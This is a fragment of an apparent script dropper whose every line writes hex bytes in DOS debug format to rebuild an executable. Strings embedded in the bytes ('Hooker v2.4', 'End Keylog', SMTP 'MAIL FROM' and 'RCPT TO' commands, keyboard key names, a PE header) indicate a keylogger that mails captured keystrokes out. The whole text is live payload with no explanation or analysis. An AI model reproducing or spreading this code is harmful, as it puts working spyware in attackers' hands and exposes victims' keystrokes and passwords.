f.WriteLine "e1230 d5 51 cb f8 42 0c 46 29 8d 46 1b 50 74 1b 1c 24"
f.WriteLine "e1240 b6 1a 05 10 5a ff 76 9f 24 74 af d1 61 6a 14 a8"
f.WriteLine "e1250 15 7d 18 49 cc 66 87 0c 10 95 88 25 45 6a 38 86"
f.WriteLine "e1260 c0 34 59 a7 2d ef cd 9c 8b 01 15 1b 5d 47 48 bc"
f.WriteLine "e1270 09 90 08 04 25 11 80 d9 1c 70 c3 a1 4b 91 60 56"
f.WriteLine "e1280 00 62 db c3 42 03 d6 50 3e a8 a8 9f 59 48 92 b5"
f.WriteLine "e1290 8b c2 13 43 b9 e3 01 c8 39 ac a9 57 b8 46 7d 49"
f.WriteLine "e12A0 2b 2a 98 f8 35 4e 18 de c2 c5 05 2c 30 e0 bb ae"
f.WriteLine "e12B0 c0 03 eb e8 1b 10 48 8d 8c 13 f6 47 9c 0d fd 88"
f.WriteLine "e12C0 1c 01 9f 59 a3 0e 27 62 71 ec ab 74 36 dc 63 80"
f.WriteLine "e12D0 4f 6a 28 58 39 6d bc c3 68 b7 4e bc d7 21 80 7c"
f.WriteLine "e12E0 43 42 b3 3d 84 e8 75 75 2e 1f d4 c4 0d 0d 90 41"
f.WriteLine "e12F0 1e e8 53 10 12 df e0 80 d2 04 6c 73 06 89 1d 68"
f.WriteLine "e1300 61 6e 02 06 69 90 30 b7 68 98 54 80 8f 01 29 00"
f.WriteLine "e1310 89 d1 d5 52 9f 05 1a c6 56 ac 1c 7c 54 0a de ae"
f.WriteLine "e1320 d0 3b 68 6c 07 ef 09 5c 54 2b 66 db b5 be a6 d6"
f.WriteLine "e1330 88 96 3b c6 32 97 4c b1 3c db 3b de 07 8f fe 87"
f.WriteLine "e1340 05 23 5b 34 14 68 33 f8 3c d0 c7 75 b5 70 63 07"
f.WriteLine "e1350 28 74 7a 74 68 1b c8 84 6c ba f4 f4 0c 76 32 22"
f.WriteLine "e1360 10 88 0e 75 29 1c bd c2 e6 e5 48 72 3b 85 d8 74"
f.WriteLine "e1370 1b 1e 07 8d 16 cf b6 64 01 16 44 c6 4a aa bc 3f"
f.WriteLine "e1380 cc 6c 0b 40 72 ff 55 f8 eb 94 a8 1d 3c ec 18 52"
f.WriteLine "e1390 5e 5f f9 f8 05 24 65 cc 57 6b ba ff 03 fe fd d7"
f.WriteLine "e13A0 97 0c cb f6 20 d1 cf 39 89 75 dc 02 d8 e0 86 c0"
f.WriteLine "e13B0 b2 2c e8 e4 bc 6f 84 10 0f f1 26 33 50 2f 22 24"
f.WriteLine "e13C0 1b 8e 64 58 56 ef c5 90 16 31 53 53 9b 18 f3 c9"
f.WriteLine "e13D0 c6 60 20 53 3a 56 8d 43 ff fb 3b 36 34 e1 4a 7c"
f.WriteLine "e13E0 19 63 03 c6 8a 08 30 48 ff 09 5b dc 58 06 00 ff"
f.WriteLine "e13F0 5b 79 e7 46 33 43 00 b3 e1 9e 6a 62 27 58 ff 8b"
f.WriteLine "e1400 0d b5 a5 df 81 bd 0f 04 31 91 2e 2a 24 b4 07 6e"
f.WriteLine "e1410 f0 a7 bb 02 8a c8 83 65 d2 32 0d 47 cd dc fb ee"
f.WriteLine "e1420 8b bd 76 21 83 e1 01 66 31 0f 1b 17 32 25 53 b2"
f.WriteLine "e1430 11 02 04 08 43 32 25 53 10 20 66 6e 3a 30 c8 23"
f.WriteLine "e1440 cb 33 c9 1b b6 66 25 ac 3d 68 15 57 dc 49 19 13"
f.WriteLine "e1450 91 67 6c f7 85 5a 95 a3 f2 0a 5e f6 83 08 2c 98"
f.WriteLine "e1460 72 0a a3 d8 95 d3 84 24 71 04 3e 2a 46 66 12 7f"
f.WriteLine "e1470 a0 54 89 91 ef 8d 0c 3e 51 97 03 67 50 1b 26 21"
f.WriteLine "e1480 ff b0 ed 58 c9 70 7c 07 01 3a f7 4a 72 bc 52 d8"
f.WriteLine "e1490 84 56 98 7a 7a ba 32 19 ab 8f 20 a5 59 45 57 20"
f.WriteLine "e14A0 01 63 35 3f 57 1d 05 b3 cd ce 0c 0e 41 7e e1 4f"
f.WriteLine "e14B0 c8 00 74 43 68 b6 c8 45 82 0c 32 c9 60 11 58 86"
f.WriteLine "e14C0 5a 2d c8 20 93 8a 59 4a 19 ec 45 92 6a 5e 14 6e"
f.WriteLine "e14D0 fa a2 41 2e 5c a1 29 23 48 cc 6e dd bc 66 3d 0a"
f.WriteLine "e14E0 75 16 38 cc c6 62 8f b9 26 97 bc eb 3a 0f c4 66"
f.WriteLine "e14F0 2b 99 27 16 33 57 4d 60 e9 d1 18 2c 60 29 77 e2"
f.WriteLine "e1500 59 0b 93 da 0c ec 0f 72 26 62 2e 99 e4 3b 97 5e"
f.WriteLine "e1510 66 5f 11 64 b0 c9 d3 8e 11 60 7c e8 d6 0a 3c 46"
f.WriteLine "e1520 a6 a3 a2 2e 45 94 f2 1d 48 53 c9 a4 a4 12 d4 bb"
f.WriteLine "e1530 5d b0 02 f5 05 21 45 04 1a c6 3a 49 a7 36 1c ee"
f.WriteLine "e1540 02 60 b4 55 93 8a b0 90 00 ba 2a 7c 61 1a 12 e0"
f.WriteLine "e1550 70 cf 10 d7 46 3b 20 d7 92 01 13 22 3d cc ff 35"
f.WriteLine "e1560 eb ac d7 d7 c4 d9 74 19 68 9c 55 4d a5 ae 58 ca"
f.WriteLine "e1570 7c 06 7c 8c d0 bf c8 ee 44 45 2b 8c 55 25 5b 68"
f.WriteLine "e1580 ba 13 df 93 78 68 60 07 a3 ee 0c 48 19 e9 4e 44"
f.WriteLine "e1590 cd 19 30 c8 af 7d 76 1f 33 c9 a3 e8 28 39 0d 74"
f.WriteLine "e15A0 1d 07 23 78 f1 3f db 74 15 0f c8 0d 3b c1 74 09"
f.WriteLine "e15B0 c6 05 5e f0 3e bc b7 77 07 80 25 08 06 01 90 b5"
f.WriteLine "e15C0 e3 84 0c 19 c6 0c 59 bb 0d 85 61 62 c6 8c a5 9a"
f.WriteLine "e15D0 7b 0b 70 b5 ae 30 f5 6c 68 28 68 b0 b5 d3 b0 6a"
f.WriteLine "e15E0 6e 1c 5c d6 15 d4 0c 98 8d 6c d5 58 ec 2d e0 68"
f.WriteLine "e15F0 e2 00 0f a3 6c 3f 5d fd d0 7b 6a 84 27 d4 61 54"
f.WriteLine "e1600 3b 15 86 15 34 ba ec ec 8f 2b 04 33 e0 29 b7 3d"
f.WriteLine "e1610 6d be 0d 63 b1 68 20 26 f0 03 14 55 60 c0 3c 4f"
f.WriteLine "e1620 46 ce 0c 08 d4 fc 54 ec 10 0b 15 8a 5b 22 c0 a2"
f.WriteLine "e1630 91 65 8b 7f 08 d4 8a ec 5b 65 73 f0 d5 d3 07 79"
f.WriteLine "e1640 a0 4d c1 80 42 f3 b4 c1 e9 0a 51 91 93 43 3a 1c"
f.WriteLine "e1650 ab 50 b7 f8 be 1f b9 7b b2 d4 02 84 f8 67 e0 06"
f.WriteLine "e1660 20 13 4f e8 39 17 22 15 20 9c 4c 72 d1 98 b9 64"
f.WriteLine "e1670 1d 10 37 02 75 d4 36 ec 45 23 06 08 bd e0 a0 13"
f.WriteLine "e1680 91 c0 a4 9a 4e 8f fa b0 c1 99 c4 25 e8 92 d7 d7"
f.WriteLine "e1690 4b 9a 93 9d 08 3a 0c fe cc c9 d0 24 66 97 5f 2c"
f.WriteLine "e16A0 2d 52 1d 88 86 ea e4 d3 48 52 c5 46 1c d6 26 e4"
f.WriteLine "e16B0 ec 03 37 48 2f b4 a4 1a b9 92 41 48 38 53 2e a2"
f.WriteLine "e16C0 44 92 a6 bb 7e a7 a3 99 8e 53 c4 f8 07 28 ff 98"
f.WriteLine "e16D0 8d 22 0b 06 fc 29 13 de c0 35 1b 20 10 13 45 d2"
f.WriteLine "e16E0 80 7d ff 42 9c 30 36 93 4a 7a 55 c0 82 d8 7e f1"
f.WriteLine "e16F0 cd 0c 59 f6 45 b5 02 f9 75 1b 27 fd 18 72 bb e0"
f.WriteLine "e1700 c3 9f 74 11 e2 08 fc ce 56 c2 9e 29 59 f3 3a 00"
f.WriteLine "e1710 62 1b 7b a1 c2 bc 74 7a 5c 03 50 ec 52 94 98 70"
f.WriteLine "e1720 59 3a 47 16 31 84 d2 e6 1d b4 74 5a 97 64 8a d3"
f.WriteLine "e1730 ed a8 4b 9f d0 50 04 ce 92 4d 2f 66 43 2d 6c fb"
f.WriteLine "e1740 a8 54 fa ef c8 41 cf b0 c1 e8 09 a8 01 c6 45 fd"
f.WriteLine "e1750 01 06 f1 5b 56 4f 8f 7e 55 d4 18 c4 26 7a ad ee"
f.WriteLine "e1760 59 a3 dc 3c ed 16 27 da a7 76 0a 74 c8 dc eb 8c"
f.WriteLine "e1770 b7 ed cf e0 45 dc a0 98 c0 e9 02 f6 c1 3f 54 24"
f.WriteLine "e1780 d8 1e 13 66 0b db 76 4b aa fe 0d 45 8a 6a f4 49"
f.WriteLine "e1790 8a 43 55 ab 7d 0d a1 fa 66 b7 1f 3c 74 05 93 76"
f.WriteLine "e17A0 12 1b fe 50 26 b6 58 eb 29 e6 a3 ed 55 62 d8 fb"
f.WriteLine "e17B0 00 7c 7b d8 53 e0 14 76 36 d4 74 25 54 08 74 4a"
f.WriteLine "e17C0 0e 28 7c 09 32 b2 3c db f7 1b 5e 59 05 fb 3e e0"
f.WriteLine "e17D0 e0 e8 56 72 d8 d8 39 92 33 3d 38 b6 72 90 c1 85"
f.WriteLine "e17E0 38 19 ea 41 e8 58 14 58 7a e8 51 f4 06 73 be 6d"
f.WriteLine "e17F0 23 c0 04 d0 03 19 f4 56 e4 05 76 0d db 76 b5 db"
f.WriteLine "e1800 08 e4 2c 1e 43 4d 29 18 2a e4 07 14 cd 2c 10 d8"
f.WriteLine "e1810 14 3a 66 f8 3f 6a d6 0d c2 10 00 cc ff 25 28 c9"
f.WriteLine "e1820 05 c8 c8 c8 c8 30 2c 18 24 c8 c8 c8 c8 1c 0c 10"
f.WriteLine "e1830 14 91 91 e7 c8 20 9c 72 a0 a4 91 91 91 91 b0 6c"
f.WriteLine "e1840 c8 cc 30 f5 c9 9a d0 cc 00 51 3d 00 10 e1 ec f7"
f.WriteLine "e1850 7d a9 8c 72 14 81 e9 0b 2d 04 85 01 17 fb df 2e"
f.WriteLine "e1860 75 73 ec 7e 8b c4 0c 8b e1 8b 08 8b 40 04 50 c3"
f.WriteLine "e1870 a5 1d 0d 25 ac d8 3f cc 6a c8 40 fe ea 65 03 c2"
f.WriteLine "e1880 10 3e 64 a1 00 2a 64 89 25 10 37 b4 f1 07 38 98"
f.WriteLine "e1890 d7 89 65 e8 91 ad 42 af e5 0f 9d da 88 08 b2 b9"
f.WriteLine "e18A0 f3 04 c7 05 84 00 09 88 db ae d4 d9 70 8c bc 0f"
f.WriteLine "e18B0 89 08 0d 90 b6 f8 7e 3e 15 7c 10 a1 94 0c 08 c0"
f.WriteLine "e18C0 8c 7d ac 1f 29 99 2d fc a1 c0 55 69 0e 68 f0 3d"
f.WriteLine "e18D0 8e fa 9b 7d af 78 58 1b cc 68 0c 8e f8 6c db d9"
f.WriteLine "e18E0 08 50 2a c2 16 08 47 78 55 94 16 be d9 9a 1f 50"
f.WriteLine "e18F0 62 74 51 8d 55 9c 52 d2 90 40 24 d8 5e 4d a0 51"
f.WriteLine "e1900 3f 80 4f 3c dd 92 af fd 3a 00 88 bc 30 bb 6e a1"
f.WriteLine "e1910 6f d9 8c 80 3e 22 e5 a8 c9 46 0c 8a 06 4f b6 fb"
f.WriteLine "e1920 4b 54 74 04 3c 22 75 f2 16 75 04 12 0a 3c 20 ed"
f.WriteLine "e1930 76 b6 df 77 06 0d eb f0 f7 d0 68 a4 52 45 e9 52"
f.WriteLine "e1940 db 9a 00 f6 10 01 20 53 d4 25 ee 29 1e 6e 81 e1"
f.WriteLine "e1950 b8 0a 2e 56 34 c5 ad 67 1d f8 71 86 22 3f 02 98"
f.WriteLine "e1960 50 6f 28 d4 b3 49 b8 22 39 7c 09 89 4d 88 ba 17"
f.WriteLine "e1970 36 df 50 51 92 bc c3 8b 53 8b 55 88 54 e8 2c 70"
f.WriteLine "e1980 30 cc f5 60 40 c7 f0 bc bd e3 2c 7a 0d 55 8b e5"
f.WriteLine "e1990 5d c3 99 20 0f 86 91 8d c7 5e 43 8f f1 90 90 05"
f.WriteLine "e19A0 ec cb 95 5a 90 7c e9 a9 ee 89 f6 c0 9e 9d 5b 2e"
f.WriteLine "e19B0 12 90 00 33 c0 0f 23 df c2 16 0d 4f 84 68 c7 00"
f.WriteLine "e19C0 2a 33 00 65 00 c0 5c d3 72 6f 87 03 00 7c a5 38"
f.WriteLine "e19D0 00 b4 28 07 b0 d3 34 4d d7 ac 03 a8 a4 a0 9c 34"
f.WriteLine "e19E0 5d 33 58 98 1f 94 90 03 8c 88 d3 34 4d d3 84 80"
f.WriteLine "e19F0 7c 78 74 ff df 34 4d 70 6c 68 44 65 63 00 4e 6f"
f.WriteLine "e1A00 76 00 4f 63 74 00 53 ee f6 cd ff 65 70 00 41 75"
f.WriteLine "e1A10 67 00 4a 75 6c 6e 00 4d 61 79 0f 70 72 07 7f bb"
f.WriteLine "e1A20 6c 6f 03 46 65 62 13 61 53 61 27 46 72 69 00 54"
f.WriteLine "e1A30 68 7f e7 96 ff 75 00 57 65 64 00 54 75 65 6f 17"
f.WriteLine "e1A40 2f 48 6f 6f 6b 65 72 20 d9 f2 db ff 76 32 2e 34"
f.WriteLine "e1A50 00 25 73 2c 20 25 08 32 75 20 25 73 75 0b dc b6"
f.WriteLine "e1A60 0b d8 3a 05 ab 77 2b 53 72 03 f6 fe 9b 29 9b 2d"
f.WriteLine "e1A70 50 61 73 3a 20 00 52 65 05 00 b6 bd cd fd 51 55"
f.WriteLine "e1A80 49 54 0d 18 03 2e 06 23 3d 00 be 73 ee ff 45 6e"
f.WriteLine "e1A90 64 20 4b 65 79 6c 6f 67 0c 14 05 42 65 67 69 6e"
f.WriteLine "e1AA0 df 3f d8 c0 14 26 4e 65 74 77 6f 72 6b 54 73 58"
f.WriteLine "e1AB0 b2 f7 76 08 64 73 1c 47 33 21 37 57 00 12 22 17"
f.WriteLine "e1AC0 40 75 6d f9 5b b2 f6 43 61 63 68 de 1c e3 50 52"
f.WriteLine "e1AD0 2e 44 4c 4c 1b bb dd 06 27 d3 49 44 a7 25 58 53"
f.WriteLine "e1AE0 57 25 74 db ed 7f 20 6e 6f 74 20 64 6f 77 6e 87"
f.WriteLine "e1AF0 61 64 37 0a cf 4c 63 ed 0b ad 12 1a 64 69 66 69"
f.WriteLine "e1B00 10 d3 48 96 f0 6e ef 74 74 70 08 2b 6e 65 37 1f"
f.WriteLine "e1B10 dc ff 36 12 1c 1d 57 69 6c 6c 20 62 65 20 6b 07"
f.WriteLine "e1B20 5b 7b 0d c1 3e 53 0a 6a bc 58 61 c2 05 e7 66 15"
f.WriteLine "e1B30 11 17 7b 62 6a c6 1e b6 61 d8 74 0e 9f 6f 6d 0c"
f.WriteLine "e1B40 54 6f 87 6c 0b cf 09 58 2d c5 69 33 72 44 cd ba"
f.WriteLine "e1B50 b1 0b c7 65 3a 7b 2b 70 69 75 0b 3f bc dd 17 33"
f.WriteLine "e1B60 35 34 1b 41 54 41 74 32 35 00 8f 43 64 ff cf ff"
f.WriteLine "e1B70 50 54 20 54 4f 3a 3c 25 73 3e 4d 41 49 4c 20 46"
f.WriteLine "e1B80 52 4f 4d 11 b6 e7 de be 27 30 db 45 4c 4f 4e 10"
f.WriteLine "e1B90 0f 32 fb b6 d7 5d 72 62 af 75 b3 05 2d 04 3a 02"
f.WriteLine "e1BA0 f6 86 b9 17 0f 0c 0e 21 23 97 cd 0d 6c 15 12 3f"
f.WriteLine "e1BB0 2b 5c 00 bf 97 c1 0e ff 63 30 47 45 54 b1 48 54"
f.WriteLine "e1BC0 c5 7e bb fd 54 50 2f 31 2e 30 18 55 73 d0 2d 41"
f.WriteLine "e1BD0 67 65 6e fb 37 c9 c3 8b 2a 2d 79 2d 00 9b b0 73"
f.WriteLine "e1BE0 a9 6c 41 44 38 00 2a 00 2f 7d 0b f6 ff a7 4b 45"
f.WriteLine "e1BF0 59 5f 55 53 45 52 53 0b da 43 41 4c 5f 62 ff 60"
f.WriteLine "e1C00 bf fa 43 48 49 4e 45 13 43 55 52 52 45 4e 54 27"
f.WriteLine "e1C10 77 e1 f6 c3 33 43 4c 41 53 0e 53 5f 1e 4f 54 13"
f.WriteLine "e1C20 b0 c6 0b 0e cb a8 72 74 5f 26 0b 6b 9d a1 31 ad"
f.WriteLine "e1C30 d2 07 3d 78 23 66 6c 47 b8 09 49 50 92 09 53 91"
f.WriteLine "e1C40 76 58 58 da 3d cc 10 03 74 1f 53 63 6d 70 4c 87"
f.WriteLine "e1C50 ec 4b db 09 50 4e 0b 75 2c 6b 6d ad f9 31 08 0a"
f.WriteLine "e1C60 43 6f 6e 6e 69 06 17 22 b2 31 c0 b8 12 22 2c 59"
f.WriteLine "e1C70 1f 50 0f ec c6 db 63 8e 73 33 32 eb 78 74 0f 46"
f.WriteLine "e1C80 69 d2 0d c7 dd 72 73 10 43 72 65 1d 39 6f 6c 02"
f.WriteLine "e1C90 db 6b fc ed 6c 70 16 53 6e 61 70 73 68 e0 73 e6"
f.WriteLine "e1CA0 52 3f 45 6a 0b 02 4c 13 0c 97 54 69 74 de 96 c8"
f.WriteLine "e1CB0 1a 56 6e 23 53 fa 3f 46 d7 16 8a 20 55 ba 2c 8f"
f.WriteLine "e1CC0 43 6f 6d 70 75 dc ec f0 9d 74 39 20 90 0a 31 c9"
f.WriteLine "e1CD0 c9 b6 93 ce 4f f5 00 0b 66 66 b5 8e d2 77 6e 53"
f.WriteLine "e1CE0 47 a6 c2 61 13 42 e7 0a 83 87 52 f3 12 c9 6a 00"
f.WriteLine "e1CF0 ee a5 64 7f 49 6e 66 6f 41 17 d1 74 72 79 1c 10"
f.WriteLine "e1D00 86 6d e5 70 65 72 ea 41 17 30 70 8a bd 5d 9f 74"
f.WriteLine "e1D10 75 15 17 fe cb 5e e8 96 49 16 52 d5 41 50 49 f3"
f.WriteLine "e1D20 28 3c b8 ae 52 40 73 bb b2 69 39 7d 41 70 41 3e"
f.WriteLine "e1D30 9f d8 23 01 12 15 00 02 b4 29 8a a8 2c 3d fe a1"
f.WriteLine "e1D40 82 b2 00 01 04 00 4b 00 44 00 4c 80 f3 17 66 1f"
f.WriteLine "e1D50 4d 5a 90 00 03 20 83 6c 2f 7b 53 b8 40 97 ff 77"
f.WriteLine "e1D60 03 80 04 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c 54"
f.WriteLine "e1D70 68 c8 04 fd ff 69 73 20 70 72 6f 67 72 61 6d 20"
f.WriteLine "e1D80 63 61 6e 1d ff 0d e8 0d cc 72 75 6e bd 20 44 4f"
f.WriteLine "e1D90 53 20 6d 6f 64 fc 97 83 fd 65 2e 0d 0d 0a 24 57"
f.WriteLine "e1DA0 50 45 4c 01 06 00 a8 eb b3 39 2a b6 6f 87 e0 55"
f.WriteLine "e1DB0 21 0b 01 05 08 08 41 ae 7b e6 44 13 a0 15 04 10"
f.WriteLine "e1DC0 03 cd 66 9f 3b 11 09 0b 02 b7 df b0 d9 65 83 00"
f.WriteLine "e1DD0 70 0c 02 29 03 18 ac 1b b6 06 47 83 e8 3c 80 64"
f.WriteLine "e1DE0 39 48 6f 60 f4 08 d0 a1 6c 78 57 2e 74 83 5c d8"
f.WriteLine "e1DF0 17 ec 56 06 90 eb 04 7d 20 de cc 55 dc 2e 72 64"
f.WriteLine "e1E00 ee ab fb c5 76 0b fb d4 0c 27 6a 40 2e 26 53 32"
f.WriteLine "e1E10 c8 b3 27 fc 30 0e c0 c9 d8 ec d9 2e 69 28 7c 01"
f.WriteLine "e1E20 10 27 10 83 7c ee 5f 53 48 41 52 45 44 96 27 50"
f.WriteLine "e1E30 12 3c cb 3f 25 d0 2e 72 65 6c 6f 63 38 60 90 35"
f.WriteLine "e1E40 25 83 14 42 17 bc 2b 6a 44 2a 6a 01 a3 dc 30 28"
f.WriteLine "e1E50 1a 6f 32 10 58 c2 57 c6 bb be ab e0 53 d7 08 56"
f.WriteLine "e1E60 0f 85 62 1d f6 45 c0 2f a0 db 13 80 09 55 03 c9"
f.WriteLine "e1E70 b8 90 fc e6 f2 56 af 81 e6 ff 88 9d 3b f0 0f 8f"
f.WriteLine "e1E80 5f 02 b9 bd 34 50 ed 42 83 fe 21 0e 50 01 ff 77"
f.WriteLine "e1E90 cb f3 34 01 11 a3 2b 74 7e 8b c6 83 e8 08 74 6d"
f.WriteLine "e1EA0 48 74 66 b6 a6 a8 54 a0 39 07 2c 56 be db ba df"
f.WriteLine "e1EB0 2d 34 3d e4 80 10 32 84 0c 39 1d 04 51 00 9e 6f"
f.WriteLine "e1EC0 b7 e9 0b 78 68 d4 17 e9 60 09 d0 56 40 9e 6f c0"
f.WriteLine "e1ED0 1f 58 15 c8 40 ec f9 9e 67 42 c0 2a 09 b8 20 62"
f.WriteLine "e1EE0 f9 06 64 99 11 21 15 22 b0 b2 2d 7f ee fd ab a0"
f.WriteLine "e1EF0 12 74 5e 45 9b 1f 4f f7 b2 cb 07 91 01 2b e9 01"
f.WriteLine "e1F00 4e a8 d1 19 b0 e5 90 01 14 d2 22 c6 e7 19 b0 e7"
f.WriteLine "e1F10 9c ae 38 b0 94 19 b0 65 92 98 12 99 22 8d e7 19"
f.WriteLine "e1F20 b0 e7 8c 75 15 77 84 f6 07 fe 9b 5f 8d 46 de 83"
f.WriteLine "e1F30 f8 0c 0f 87 fd a9 24 85 a8 13 17 cf 80 6d ef 39"
f.WriteLine "e1F40 35 4b 28 4e 34 42 7c 9e 67 c0 62 ff 15 2c 74 14"
f.WriteLine "e1F50 25 9f 67 40 16 6c fe 00 e6 80 3c cf 00 64 e8 ea"
f.WriteLine "e1F60 00 9e 67 40 9e 5c d2 d4 54 bc 40 9e 67 40 be 4c"
f.WriteLine "e1F70 a6 67 40 9e 67 a8 44 90 92 b3 df df 9b 34 eb 7d"
f.WriteLine "e1F80 68 2c 06 76 39 05 d5 74 7c 21 c5 0d f7 f7 74 74"
f.WriteLine "e1F90 68 20 16 5f b8 91 29 6b 74 41 08 d7 1e 42 04 a8"
f.WriteLine "e1FA0 40 17 0c b6 ed 61 0f 11 14 75 10 02 0c 1a ac fb"
f.WriteLine "e1FB0 7f bf 60 2d 01 75 0b 80 bd 1f 20 73 02 33 c0 88"
f.WriteLine "e1FC0 9c 05 0b cc 83 0c f6 eb 23 60 1b 13 68 10 d9 6e"
f.WriteLine "e1FD0 30 a2 a5 ad fd 59 59 0d 44 98 2d c2 89 5f 13 93"
f.WriteLine "e1FE0 a1 35 87 35 88 56 24 82 03 4d 2e de 39 ec b3 59"
f.WriteLine "e1FF0 3d 73 3c 3e 68 8d e1 5b e2 fb 0d a1 21 8d 26 50"
f.WriteLine "e2000 44 48 fc 69 d2 1c f6 c4 0c 42 3f 01 68 b7 a3 62"
f.WriteLine "e2010 b6 7d 17 b9 2f 35 e0 74 57 81 6b 36 c2 a4 eb b6"
f.WriteLine "e2020 be 6c b6 db 25 98 0b 12 0d f5 11 03 df 21 12 80"
f.WriteLine "e2030 34 4d b3 4d 37 63 b3 ef c9 74 cd 79 bd 23 8c db"
f.WriteLine "e2040 a3 e2 f7 ff 6f ef c3 8b 0d 68 4b 56 57 85 c9 74"
f.WriteLine "e2050 58 8b 7c 24 10 3b cf 7e 32 be 98 51 f4 a5 8a 96"
f.WriteLine "e2060 74 24 14 e8 e2 ec 5d cc 14 ae a2 8b c8 2b cf b5"
f.WriteLine "e2070 51 3b 7f b6 a9 84 7c 40 15 c7 eb 1e 51 68 30 0a"
f.WriteLine "e2080 de 01 19 79 83 25 08 58 80 78 97 13 c3 a1 bb 9e"
f.WriteLine "e2090 12 b0 af 8d 6d 9e 9c 40 0a 07 1d 14 00 24 89 ea"
f.WriteLine "e20A0 15 5a 84 7e 0f 8d 66 f8 58 69 c3 0b 19 74 05 e8"
f.WriteLine "e20B0 c4 13 20 f8 e5 28 0a 33 8e 68 0f c2 75 15 98 e4"
f.WriteLine "e20C0 d1 a0 47 dc ff 59 23 83 59 0f 95 c1 8a c1 c3 ff"
f.WriteLine "e20D0 25 80 14 17 ac 19 d9 05 84 78 cc 00 f3 fe db 6e"
f.WriteLine "e20E0 2d b5 26 75 11 f2 e8 30 c9 7e 31 49 89 dd 9f b1"
f.WriteLine "e20F0 c5 0a 10 94 14 8b 11 89 15 ec 10 75 0b 91 ed c5"
f.WriteLine "e2100 53 68 c1 e0 88 2a f4 73 0d 86 63 61 75 06 73 71"
f.WriteLine "e2110 c7 1b e2 dd 6c be 9f 14 68 04 04 00 a3 f0 e8 17"
f.WriteLine "e2120 01 1e 7c 6f cf 18 53 35 08 40 a3 08 b8 fe ef 23"
f.WriteLine "e2130 4b f7 35 7a 40 f4 74 36 8b 35 2f 66 0b 86 ff 83"
f.WriteLine "e2140 ee 04 3b f1 72 15 8b 06 0d de d0 1e 7b 4f b6 c7"
f.WriteLine "e2150 14 73 eb 51 7e 90 c7 05 16 73 81 ea 36 d9 4c 90"
f.WriteLine "e2160 00 53 55 a1 da c3 8e bd 14 85 f6 57 15 75 13 d7"
f.WriteLine "e2170 75 09 a6 bb c1 39 a8 b1 26 cf 1c 8b 5c 24 ed ad"
f.WriteLine "e2180 b0 40 6b 01 4a 04 02 75 28 81 bb ee 85 93 f8 05"
f.WriteLine "e2190 de 53 ff d1 77 0c 08 e8 df f2 5b e6 4c 22 a0 39"
f.WriteLine "e21A0 14 fa f9 db 8d 1b bb 39 8b e8 7d 85 ed 7e 57 50"
f.WriteLine "e21B0 27 b7 63 f2 fd 3d f6 4b 03 75 22 38 a6 8d f6 0e"
f.WriteLine "e21C0 ef 6d ed 22 74 10 a1 5c d9 5c ce 99 05 37 fb e8"
f.WriteLine "e21D0 5f 8b c5 4e af 8d 8c a4 16 11 59 1b 7b bf 20 1b"
f.WriteLine "e21E0 3d 50 20 86 01 03 28 20 cb 65 d3 2c 38 48 e6 13"
f.WriteLine "e21F0 4f 14 7d 34 5d d7 35 dc 0b 5e 13 66 03 70 79 49"
f.WriteLine "e2200 d4 12 cf 39 4c 03 ab 2a 49 94 fb 64 6c 6c 2e 03"
f.WriteLine "e2210 ad 1a 12 35 24 cd cb 10 90 2d 89 ec 00 5b d5 46"
f.WriteLine "e2220 75 7b 77 6f 82 4c 3f ec ef 52 d4 6b 7d 0f 4e 75"
f.WriteLine "e2230 6d 0c 7b 44 45 4c 1e bb fb 63 13 50 72 69 6e 74"
f.WriteLine "e2240 20 29 65 65 6e 17 4f 57 4e f3 ed 3f ff 1f 55 50"
f.WriteLine "e2250 7d 00 52 49 47 48 54 7d 17 4c 45 46 54 7f 1f f9"
f.WriteLine "e2260 fb 50 67 44 6e 3f 45 4e 44 48 4f 4d 45 4f 49 4e"
f.WriteLine "e2270 53 d5 c9 df 27 67 55 70 0f 41 4c 54 41 59 a3 ea"
f.WriteLine "e2280 4a 5d 3f 43 7f 7c c9 ef 23 bb 3b 53 43 43 54 52"
f.WriteLine "e2290 4c 6b 42 53 63 cb 6d f6 54 41 42 17 6c 41 52 0a"
f.WriteLine "e22A0 c3 48 7b 00 81 bd 49 78 00 60 40 0b 40 07 2c 2f"
f.WriteLine "e22B0 0e 41 9c b7 40 81 01 e7 64 cb 42 41 c3 a6 69 ba"
f.WriteLine "e22C0 2e 1b 38 03 1a 24 62 d7 9d 6d 9a 56 4e 6c 41 23"
f.WriteLine "e22D0 e4 3b fa 03 ac ca 36 4d b4 d0 c6 40 3b ab 6a 34"
f.WriteLine "e22E0 5a de 18 a2 c4 ff 6d 13 80 95 45 78 11 3a 02 54"
f.WriteLine "e22F0 6f 41 73 63 69 aa be cb f5 69 00 06 01 73 5b 62"
f.WriteLine "e2300 6f 61 72 64 68 74 ef 6a df 65 bf 02 55 6e 68 29"
f.WriteLine "e2310 57 b5 b5 07 5b 02 aa 73 34 25 02 53 29 36 00 b4"
f.WriteLine "e2320 84 12 76 d4 33 32 7e 17 ff b1 ba 00 92 02 6d 65"
f.WriteLine "e2330 6d 63 70 e7 b9 02 73 74 72 6c bf b1 b3 35 ea 09"
f.WriteLine "e2340 b5 13 93 1d 6d 6f 33 7d f6 b7 76 5e 4d 53 56 43"
f.WriteLine "e2350 52 54 33 59 02 66 13 07 f6 56 75 7b 0b 01 5f 58"
f.WriteLine "e2360 69 74 2b 6d 00 8c 29 be 50 13 b8 ad 23 9a 21 61"
f.WriteLine "e2370 64 6a 75 00 c2 8a df 42 5f 66 64 69 76 18 ff 1f"
f.WriteLine "e2380 23 2e 10 df 07 30 88 30 95 30 a0 30 aa 30 b5 30"
f.WriteLine "e2390 7f a1 4b fd c0 30 cb 30 d6 30 6f eb 30 e8 03 31"
f.WriteLine "e23A0 24 31 2f 31 ff ff ff ff 3a 31 47 31 52 31 5d 31"
f.WriteLine "e23B0 68 31 73 31 80 31 8b 31 96 31 a1 31 b9 31 bf 31"
f.WriteLine "e23C0 cb 31 d6 31 e1 31 ec 31 ff 25 80 ff f7 31 02 32"
f.WriteLine "e23D0 0d 32 18 32 23 fb 39 32 44 32 4f 32 5a 32 ff ff"
f.WriteLine "e23E0 ff ff 65 32 70 32 7b 32 86 32 8d 32 95 32 9d 32"
f.WriteLine "e23F0 a4 32 bc 32 d7 32 f6 32 fe 32 05 33 1f 33 3c 33"
f.WriteLine "e2400 5e 33 df e8 ff ff 64 33 7f 33 94 33 9a 33 a8 33"
f.WriteLine "e2410 ac 33 b0 33 b4 33 b8 33 bc 97 33 c4 33 c8 ff ff"
f.WriteLine "e2420 ff ff 33 cc 33 d0 33 d4 33 d8 33 e1 33 e8 33 fd"
